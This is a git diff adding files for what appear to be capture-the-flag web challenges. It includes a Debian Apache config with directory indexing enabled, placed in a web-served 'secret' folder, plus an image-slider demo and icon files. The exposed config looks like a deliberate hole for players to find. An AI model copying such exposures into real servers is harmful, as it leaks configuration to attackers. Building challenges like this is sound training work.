+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
diff --git a/challenges/ch048/dir/index.php b/challenges/ch048/dir/index.php
new file mode 100755
index 00000000..8b3284ed
--- /dev/null
+++ b/challenges/ch048/dir/index.php
@@ -0,0 +1,6 @@
+
+
+
+
diff --git a/challenges/ch048/dir/secret/apache2.conf b/challenges/ch048/dir/secret/apache2.conf
new file mode 100755
index 00000000..0f4885e4
--- /dev/null
+++ b/challenges/ch048/dir/secret/apache2.conf
@@ -0,0 +1,221 @@
+# This is the main Apache server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+# /etc/apache2/
+# |-- apache2.conf
+# | `-- ports.conf
+# |-- mods-enabled
+# | |-- *.load
+# | `-- *.conf
+# |-- conf-enabled
+# | `-- *.conf
+# `-- sites-enabled
+# `-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+# together by including all remaining configuration files when starting up the
+# web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+# supposed to determine listening ports for incoming connections which can be
+# customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+# directories contain particular configuration snippets which manage modules,
+# global configuration fragments, or virtual host configurations,
+# respectively.
+#
+# They are activated by symlinking available configuration files from their
+# respective *-available/ counterparts. These should be managed by using our
+# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+# their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+# the default configuration, apache2 needs to be started/stopped with
+# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+# work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE! If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at );
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+
+ Options FollowSymLinks
+ AllowOverride None
+ Require all denied
+
+
+
+ AllowOverride None
+ Require all granted
+
+
+
+ Options Indexes FollowSymLinks
+ AllowOverride all
+ Require all granted
+
+
+#
+# Options Indexes FollowSymLinks
+# AllowOverride None
+# Require all granted
+#
+
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives. See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
diff --git a/challenges/ch048/dir/secret/images/image.jpeg b/challenges/ch048/dir/secret/images/image.jpeg
new file mode 100755
index 00000000..256eb82c
Binary files /dev/null and b/challenges/ch048/dir/secret/images/image.jpeg differ
diff --git a/challenges/ch048/dir/secret/images/its.jpg b/challenges/ch048/dir/secret/images/its.jpg
new file mode 100755
index 00000000..32432128
Binary files /dev/null and b/challenges/ch048/dir/secret/images/its.jpg differ
diff --git a/challenges/ch048/dir/secret/index.php b/challenges/ch048/dir/secret/index.php
new file mode 100755
index 00000000..a4de624c
--- /dev/null
+++ b/challenges/ch048/dir/secret/index.php
@@ -0,0 +1,53 @@
+
+
+
+
+CTF
+
+
+
As shown by the demo, the thumbnails change their active status while the main image slides, and clicking on an thumbnail will switch the main image.
+
If there are lots of thumbnails and the containing block does not have enough room to show them,
+ you can consider showing the thumbnails in multiple columns or rows by tweaking the js-image-slider.css (Example: Place thumbnail columns around slider both sides).
+ Another solution is to make the slider work together with Menucool jQuery Slider.
+ See jQuery Slideshow.
+ Let's add a semi-transparent effect to the thumbnails, and each thumbnail will get back to its full opacity when hovered over.
+ This can be easily done via the two built-in CSS class: thumb and thumb-on:
+ #thumbs .thumb img{ opacity:0.6;filter:alpha(opacity:60); }
+#thumbs .thumb-on img{ opacity:1;filter:alpha(opacity:100);}
+
And there you have it!
+
+
If there are lots of thumbnails and the containing block does not have enough room to show them,
+ you can consider showing the thumbnails in multiple columns or rows by tweaking the js-image-slider.css.
+ Another solution is to make the slider work together with Menucool jQuery Slider.
+ See jQuery Slideshow.
If your web page loads the slider markup dynamically (ajax, appendChild, etc.), or you want to update the slider items on the fly, you can use the slider's reload function:
+ imageSlider.reload();
+
+ The reload is the slider's built-in function that will help:
+
+
Load on demand - Populate slider dynamically by client event or AJAX
+
Adding/Changing items on the fly to the slider
+
+
View the source of this page for the sample code.
+
This demo contains no advanced features. It is free to use.
You'll see thumbnail previews when hovering on pagination bullets in the demo. The thumbnail previews are created by the
+ slider's built-in function, thumbnailPreview, with the assistance of the
+ Menucool Tooltip widget.
This demo has not used the slider's advanced features, hence it does not require slider license. However, a Tooltip license is required for using the tooltip widget to preview thumbnails.
+ If you have also included slider's advanced features, slider license is also required.
+
+
+
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css b/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css
new file mode 100755
index 00000000..701cc322
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/generic.css
@@ -0,0 +1,23 @@
+
+/* For generic page styles. Not for sliders. */
+
+body {background:#F6F6F6;font:normal 0.9em Arial; margin:0; padding:0; padding-bottom:60px;}
+h2 {display:inline;}
+.div1, .div2 {width:700px;margin:0 auto;}
+.div1 {margin-top:30px;margin-bottom:60px;text-align:center;line-height:20px;}
+.div1 P {font-size:18px;}
+.div1 a, .div2 a {color:#07C; }
+.div1 a {margin:0 8px;}
+.div1 a.current {color:black; text-decoration:none;}
+.div2 {margin-top:70px;}
+.div2 li {padding-top:6px;padding-bottom:6px;}
+.green {color:Green;}
+.cn {font-family: "Courier New", Georgia;}
+#status {display:inline-block; margin-left:26px;line-height:50px;height:50px;vertical-align:middle;}
+
+.code
+{
+ border: dashed 1px #BCBCCB; padding:8px 12px; background-color: #F3F3F9; white-space:pre; font-family:"Courier New", Georgia;
+ font-size:12px; margin:6px 0;overflow:auto;
+}
+
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif
new file mode 100755
index 00000000..592343c5
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption1.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif
new file mode 100755
index 00000000..906ba1f6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption2.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif
new file mode 100755
index 00000000..0686053e
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption3.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif
new file mode 100755
index 00000000..ea347d4a
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/caption4.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg
new file mode 100755
index 00000000..902b3b10
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg
new file mode 100755
index 00000000..6d8f41bb
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg
new file mode 100755
index 00000000..dc42c7b6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg
new file mode 100755
index 00000000..26572141
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg
new file mode 100755
index 00000000..9ec2c4b2
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/image-slider-5.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg
new file mode 100755
index 00000000..df340018
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg
new file mode 100755
index 00000000..0f1feb35
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg
new file mode 100755
index 00000000..41f6d4bb
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg
new file mode 100755
index 00000000..8f49290e
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/slider-4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif
new file mode 100755
index 00000000..015b71af
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-1.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif
new file mode 100755
index 00000000..f1c30c9d
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-2.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif
new file mode 100755
index 00000000..078db6a9
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-3.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif
new file mode 100755
index 00000000..0cfb4c1a
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb-4.gif differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg
new file mode 100755
index 00000000..232f75e8
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb1.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg
new file mode 100755
index 00000000..6f442df2
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb2.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg
new file mode 100755
index 00000000..eccd6bed
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb3.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg
new file mode 100755
index 00000000..2fdac268
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb4.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg
new file mode 100755
index 00000000..f769e45d
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/images/thumb5.jpg differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png
new file mode 100755
index 00000000..a638e4d6
Binary files /dev/null and b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/bullet.png differ
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css
new file mode 100755
index 00000000..b52d0b68
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.css
@@ -0,0 +1,120 @@
+/* http://www.menucool.com */
+
+#sliderFrame, #sliderFrame div {
+ box-sizing: content-box;
+}
+#sliderFrame
+{
+ position:relative;
+ width:700px;
+ margin:0 auto; /*center-aligned*/
+}
+#slider, #slider div.sliderInner {
+ width:700px;
+ height:306px;/* Must be the same size as the slider images */
+}
+
+#slider {
+ background:#fff url(loading.gif) no-repeat 50% 50%;
+ position:relative;
+ margin:0 auto; /*center-aligned*/
+ transform: translate3d(0,0,0);
+ box-shadow: 0px 1px 5px #999999;
+}
+
+/* image wrapper */
+#slider a.imgLink, #slider div.video {
+ z-index:2;
+ position:absolute;
+ top:0px;left:0px;border:0;padding:0;margin:0;
+ width:100%;height:100%;
+}
+#slider .video {
+ background:transparent url(video.png) no-repeat 50% 50%;
+}
+
+/* Caption styles */
+#slider div.mc-caption-bg, #slider div.mc-caption-bg2 {
+ position:absolute;
+ width:100%;
+ height:auto;
+ padding:10px 0;/* 10px will increase the height.*/
+ left:0px; /*if the caption needs to be aligned from right, specify by right instead of left. i.e. right:20px;*/
+ bottom:0px;/*if the caption needs to be aligned from top, specify by top instead of bottom. i.e. top:150px;*/
+ z-index:3;
+ overflow:hidden;
+ font-size: 0;
+}
+#slider div.mc-caption-bg
+{
+ /* NOTE: Its opacity is to be set through the sliderOptions.captionOpacity setting in the js-image-slider.js file.*/
+ background:Black;/* or any other colors such as White, or: background:none; */
+}
+#slider div.mc-caption-bg2 {
+ background:none;
+}
+#slider div.mc-caption {
+ font: bold 14px/20px Arial;
+ color:#EEE;
+ z-index:4;
+ text-align:center;
+ background:none;
+}
+#slider div.mc-caption a {
+ color:#FB0;
+}
+#slider div.mc-caption a:hover {
+ color:#DA0;
+}
+
+
+/* ------ built-in navigation bullets wrapper ------*/
+/* Note: check themes\2\js-image-slider.css to see how to hide nav bullets */
+#slider div.navBulletsWrapper {
+ top:320px;/* Its position is relative to the #slider */
+ text-align:center;
+ background:none;
+ position:relative;
+ z-index:5;
+}
+
+/* each bullet */
+#slider div.navBulletsWrapper div
+{
+ width:11px; height:11px;
+ font-size:0;color:White;/*hide the index number in the bullet element*/
+ background:transparent url(bullet.png) no-repeat 0 0;
+ display:inline-block; *display:inline; zoom:1;
+ overflow:hidden;cursor:pointer;
+ margin:0 6px;/* set distance between each bullet*/
+}
+
+#slider div.navBulletsWrapper div.active {background-position:0 -11px;}
+
+
+/* --------- Others ------- */
+
+#slider div.loading
+{
+ width:100%; height:100%;
+ background:transparent url(loading.gif) no-repeat 50% 50%;
+ filter: alpha(opacity=60);
+ opacity:0.6;
+ position:absolute;
+ left:0;
+ top:0;
+ z-index:9;
+}
+
+#slider img, #slider>b, #slider a>b {
+ position:absolute; border:none; display:none;
+}
+
+#slider div.sliderInner {
+ overflow:hidden;
+ -webkit-transform: rotate(0.000001deg);/* fixed the Chrome not crop border-radius bug*/
+ position:absolute; top:0; left:0;
+}
+
+#slider>a, #slider video, #slider audio {display:none;}
+#slider div {-webkit-transform: translate3d(0,0,0);transform: translate3d(0,0,0);}
\ No newline at end of file
diff --git a/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js
new file mode 100755
index 00000000..03b55687
--- /dev/null
+++ b/challenges/newchallenge4/inside/Slider/jsImgSlider/themes/1/js-image-slider.js
@@ -0,0 +1,23 @@
+var sliderOptions=
+{
+ sliderId: "slider",
+ startSlide: 0,
+ effect: "series1",
+ effectRandom: false,
+ pauseTime: 2600,
+ transitionTime: 500,
+ slices: 12,
+ boxes: 8,
+ hoverPause: 1,
+ autoAdvance: true,
+ captionOpacity: 0.3,
+ captionEffect: "fade",
+ thumbnailsWrapperId: "thumbs",
+ m: false,
+ license: "mylicense"
+};
+
+var imageSlider=new mcImgSlider(sliderOptions);
+
+/* Menucool Javascript Image Slider v2014.9.16. Copyright www.menucool.com */
+function mcImgSlider(k){for(var T=function(a){return document.getElementById(a)},d="length",ab="getElementsByTagName",C=function(e){var a=e.childNodes,c=[];if(a)for(var b=0,f=a[d];bd?1:-1,f=Math.ceil(60*c.c/1e3),a,e=1;e<=f;e++){a=d+c.b(e/f,c.d)*j;if(h!=i)a=Math.round(a);b.push(a)}b.e=0;return b},n:function(){this.b==null&&this.p()},p:function(){this.q();var a=this;this.b=U?U(function(){a.p()}):window.setInterval(function(){a.q()},15)},q:function(){var a=this.d[d];if(a){for(var c=0;c=a.a[d])a.a.p=0}if(b<1||b>17)b=15;return b}},zb=["$1$2$3","$1$2$3","$1$24","$1$23","$1$22"],tb=function(){if(b.b!=2){b.b=1;L(s);s=null}},pb=function(){if(b.b!=2){b.b=0;if(s==null&&!b.c&&a.i)s=D(function(){m.y(m.n(b.a+1),0,1)},a.b/2)}},Ab=function(){var a=0,b=0,c;while(a-1&&typeof McVideo!=r;if(c){b=1;break}++a}return b},u=[],rb=function(b){var a=u[d];if(a)while(a--)u[a][g]=a!=b&&u[a].on==0?"thumb":"thumb thumb-on"},Cb=function(a){return a[q][h]("data-autovideo")=="true"||a[h]("data-autovideo")=="true"},Eb=function(){var f;if(a.l)f=T(a.l);if(f)for(var h=lb(f,"*"),e=0;e1){D(function(){p.e(1)},0);s=D(function(){p.y(p.n(1),0,1)},a.b+a.c)}if(a.h!=0&&!ib){f.onmouseover=tb;f.onmouseout=pb}},b:function(a){if(typeof McVideo!=r){a.onclick=function(){return this.aP?false:m.d(this)};McVideo.register(a,this)}},A:function(a){if(typeof a.aP===r){var b=a[h]("data-autovideo");if(b=="true")a.aP=true;else if(b=="1")a.aP=1;else a.aP=0}},d:function(c){L(s);s=null;var a=McVideo.play(c,v,B,this.Id);if(a||ib)b.b=2;return false},f:function(){S=A("navBulletsWrapper");for(var i=[],a=0;a"+(a+1)+"
+
+
diff --git a/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png b/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png
new file mode 100755
index 00000000..25423b60
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020759_internt_web_technology-08-128.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png b/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png
new file mode 100755
index 00000000..51f91746
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020820_internt_web_technology-14-64.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png b/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png
new file mode 100755
index 00000000..bb81ab4c
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421020862_internt_web_technology-13-48.png differ
diff --git a/challenges/newchallenge4/inside/newicons/1421021091_map-128.png b/challenges/newchallenge4/inside/newicons/1421021091_map-128.png
new file mode 100755
index 00000000..1d47948e
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/1421021091_map-128.png differ
diff --git a/challenges/newchallenge4/inside/newicons/fb24_1.png b/challenges/newchallenge4/inside/newicons/fb24_1.png
new file mode 100755
index 00000000..7a61b287
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/fb24_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/fb24_2.png b/challenges/newchallenge4/inside/newicons/fb24_2.png
new file mode 100755
index 00000000..128d9a0f
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/fb24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/gmail32.png b/challenges/newchallenge4/inside/newicons/gmail32.png
new file mode 100755
index 00000000..fd70437e
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/gmail32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/google24_2.png b/challenges/newchallenge4/inside/newicons/google24_2.png
new file mode 100755
index 00000000..7b868772
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/google24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/instagram.png b/challenges/newchallenge4/inside/newicons/instagram.png
new file mode 100755
index 00000000..68bb1a39
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/instagram.png differ
diff --git a/challenges/newchallenge4/inside/newicons/linkedin24_2.png b/challenges/newchallenge4/inside/newicons/linkedin24_2.png
new file mode 100755
index 00000000..4dc9c022
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/linkedin24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/linkedin32.png b/challenges/newchallenge4/inside/newicons/linkedin32.png
new file mode 100755
index 00000000..ea15de25
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/linkedin32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail24_1.png b/challenges/newchallenge4/inside/newicons/mail24_1.png
new file mode 100755
index 00000000..66ec95c5
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail24_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail24_2.png b/challenges/newchallenge4/inside/newicons/mail24_2.png
new file mode 100755
index 00000000..c59cac41
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/mail64_1.png b/challenges/newchallenge4/inside/newicons/mail64_1.png
new file mode 100755
index 00000000..d94a3416
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/mail64_1.png differ
diff --git a/challenges/newchallenge4/inside/newicons/place24.png b/challenges/newchallenge4/inside/newicons/place24.png
new file mode 100755
index 00000000..721525ed
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/place24.png differ
diff --git a/challenges/newchallenge4/inside/newicons/place32.png b/challenges/newchallenge4/inside/newicons/place32.png
new file mode 100755
index 00000000..87b6dee6
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/place32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twit.png b/challenges/newchallenge4/inside/newicons/twit.png
new file mode 100755
index 00000000..16b88d59
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twit.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter24_2.png b/challenges/newchallenge4/inside/newicons/twitter24_2.png
new file mode 100755
index 00000000..57c3b201
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter24_2.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter32.png b/challenges/newchallenge4/inside/newicons/twitter32.png
new file mode 100755
index 00000000..14fb00c1
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter32.png differ
diff --git a/challenges/newchallenge4/inside/newicons/twitter32_1.png b/challenges/newchallenge4/inside/newicons/twitter32_1.png
new file mode 100755
index 00000000..0d2778f6
Binary files /dev/null and b/challenges/newchallenge4/inside/newicons/twitter32_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_1.png b/challenges/newchallenge4/inside/use-icon/fb48_1.png
new file mode 100755
index 00000000..b6bc1b76
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_1.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_2.png b/challenges/newchallenge4/inside/use-icon/fb48_2.png
new file mode 100755
index 00000000..1b0af134
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_2.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_3.png b/challenges/newchallenge4/inside/use-icon/fb48_3.png
new file mode 100755
index 00000000..09694e85
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_3.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb48_4.png b/challenges/newchallenge4/inside/use-icon/fb48_4.png
new file mode 100755
index 00000000..89526692
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb48_4.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/fb_32.png b/challenges/newchallenge4/inside/use-icon/fb_32.png
new file mode 100755
index 00000000..4be62fb2
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/fb_32.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48.png b/challenges/newchallenge4/inside/use-icon/gplus48.png
new file mode 100755
index 00000000..983f1afb
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48.png differ
diff --git a/challenges/newchallenge4/inside/use-icon/gplus48_2.png b/challenges/newchallenge4/inside/use-icon/gplus48_2.png
new file mode 100755
index 00000000..ee2a147c
Binary files /dev/null and b/challenges/newchallenge4/inside/use-icon/gplus48_2.png differ
